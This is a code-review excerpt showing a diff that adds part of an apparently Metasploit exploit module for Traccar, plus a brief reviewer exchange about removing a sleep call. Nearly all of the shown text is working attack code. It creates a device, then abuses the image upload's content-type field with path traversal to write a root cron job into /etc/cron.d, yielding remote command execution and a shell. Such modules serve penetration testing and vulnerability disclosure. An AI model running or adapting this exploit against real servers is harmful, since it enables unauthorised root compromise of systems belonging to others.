modules/exploits/linux/http/traccar_rce_upload.rb

```diff
@@ -0,0 +1,262 @@
+      name: name_v,
+      uniqueId: unique_id_v
+    }.to_json
+
+    print_status('Adding new device...')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/devices'),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      },
+      'ctype' => 'application/json',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    json = res.get_json_document
+
+    unless res.code == 200 && json.key?('name') && json['name'] == name_v && json.key?('uniqueId') && json['uniqueId'] == unique_id_v && json.key?('id')
+      fail_with(Failure::UnexpectedReply, 'Received unexpected reply:\n' + json.to_s)
+    end
+
+    id = json['id'].to_s
+    body = Rex::Text.rand_text_alphanumeric(1..4)
+    fn = Rex::Text.rand_text_alpha(1..2)
+
+    print_status('Uploading crontab file...')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      },
+      'ctype' => 'image/png',
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200 && res.to_s.include?('device.png')
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      },
+      'ctype' => "image/png;#{fn}=\"/b\"",
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200 && res.to_s.include?("device.png;#{fn}=\"/b\"")
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    body = "* * * * * root /bin/bash -c '#{cmd}'\n"
+    cronfn = SecureRandom.hex(12)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "api/devices/#{id}/image"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      },
+      'ctype' => "image/png;#{fn}=\"/../../../../../../../../../etc/cron.d/#{cronfn}\"",
+      'data' => body
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    unless res.code == 200 && res.to_s.include?("device.png;#{fn}=\"/../../../../../../../../../etc/cron.d/#{cronfn}\"")
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    # It takes up to one minute to get the cron job executed; need to wait as otherwise the handler might terminate too early
+    print_status('Cronjob successfully written - waiting for execution...')
+    sleep(60)
+
+    print_status('Exploit finished, check thy shell.')
```

Comment:
Can be removed now that `wfsdelay` is being used. 
```suggestion
```

Reply:
Removed.